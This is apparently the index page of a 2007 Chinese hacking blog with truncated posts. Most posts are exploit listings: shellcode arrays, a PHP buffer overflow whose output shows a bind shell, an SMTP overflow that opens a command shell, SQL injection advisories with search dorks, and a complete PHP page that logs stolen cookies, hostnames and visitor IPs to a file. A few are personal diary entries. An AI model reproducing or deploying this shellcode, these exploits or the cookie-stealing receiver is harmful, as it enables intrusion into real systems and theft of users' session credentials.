2007-09-01 08:39
漏洞文件:
session.asp
if request.cookies("CnendWeb")("admininfo_loginname")<>"" a |
2007-09-01 08:34
// author: dummy
// written by dummyz@126.com (2007)
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
const unsigned char shellcode[174] =
{
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, |
2007-09-01 08:33
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[4])
{
print "\n |-------------------------------------------------|";
print "\n | newhack[dot]org |";
print "\n |--------------------------------------------- |
2007-08-30 09:03
我真服 一天天的漏洞出的那个叫快啊 调试中。。
/*
* MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
* by Hong Gil-Dong & Chun Woo-Chi
* Yang yeon(?~1542), Korea
* "I shall keep clenching my left fist unitl i see the real tao".
* This POC is only for test. If an application read a malformed wmf
* file like this POC, the application will be crashed. If you apply
* this code, you can execute an arbitrary |
2007-08-29 17:02
现在市面上很多人都在卖什么过全系统网马了。中马率百分之九十的网马,又什么IE新变种等等等等。
都是在扯蛋,不是百度插件的,就是ACTIVEX的马。就一个MS06014就变种出来这么多。我个人感觉只要免杀就OK了。你再怎么变,人 |
2007-08-28 15:46
真够可以的了。
旅游的时候带了一个人的帽子,,我不小心给弄丢了。
哎,~据说还是2年前的一个帽子,也不是什么名牌,
居然。。让我赔。。。。。我问他从那里买的,
他说2年前从网上买的,我曰!!!2年前的帽子 你让我怎么赔?
我说陪钱 最起码你说个价格啊 你帽子的价格啊。
真没见过这样的人。。
算了 ,,,世界大了 什么鸟都有了。
说出来都不闲丢人~~~~~~ 真他吗的是牛淫啊 |
2007-08-28 09:42
7j:没有找到他说的接收页面,只有自已用PHP写个了
<?
$filename = date("Ymd").".txt";
$time = @date("Y年m月d号H点i分s秒",time());
$cookie = $_POST['cookie'];
$url = $_POST['url'];
$hostname = $_POST['hostname'];
if ($cookie <> ""){
$tmp = fopen($filename,"a+");
fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n");
fclose($tmp);
}
?>
来源:′失眠ヤ夜 's blog
漏洞 |
2007-08-28 09:25
阅读本文之前,我们还需要对Linux系统的基本安全特性有一定的了解
Linux操作系统是一个开放源代码的免费操作系统,它不仅安全、稳定、成本低,而且很少发现有病毒传播,因此,Linux操作系统一直被认为是微软Windows系统的劲敌。近年来,随着Linux操作系统在我国的不断普及,随着越来越多的服务器、工作站和个人电脑开始使用Linux软件,当然,越来越多的安全发烧友也开始对这个操作系统发生了浓厚的兴趣。本文的目的是希望用户以最快的速度对Linux下的精品Hack软件功能及使用方法有一个比较细致全面的了解。今天我们先了解寻找 |
2007-08-24 23:16
星期6 星期天 公司组织旅游,
呵呵,,,,,,,我算是很幸运了 ,才来公司几天 就要组织旅游了,,
明天早上6点集合,,弄的今天晚上一点也睡不着,,,
只好跑网吧消磨时间来了
....要是有朋友找我有事 请给我留言好了,,
等我回来 我准时给你们回复,,,,,,,,,,呵呵~~~~~~~到时候我会把旅游景点照片发到我站上的...... |
2007-08-24 08:48
*******************************************************************************
# Title : Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.remository.com/
# $$ : Free
# Dork : inurl:func=selectcat + com_remository |
2007-08-24 08:47
*******************************************************************************
# Title : Joomla Component NeoRecruit <= 1.4 (id) Remote Blind SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.neojoomla.com/
# $$ : 54,90
# Dork : inurl:index.php?option=com_NeoRec |
2007-08-23 09:32
<?php
##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for W |
2007-08-23 09:31
<?php
/*
Inphex
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
7ffdf020 7c911005 7c9110ed 00000001 00000000
shoutz go to Kevin Finisterre
*/
if(!function_exists('win_browse_file')) {
die('win32std extension i |
2007-08-23 09:28
/*
Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal)
Public Version 1.0
http://www.ph4nt0m.org
2007-08-22
Code by: Zhenhan.Liu
Original POC: http://www.milw0rm.com/exploits/4294
Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html
Our Mail-list: http://list.ph4nt0m.org (Chinese)
It will bind a cmdshell on port 1154 if successful.
|
2007-08-22 18:43
########################################################################
# litecommerce Copyright © 2004 - Remote SQL Injection
# Vendor : http://www.litecommerce.com/
# Found By : k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
# Dork |
|
| |
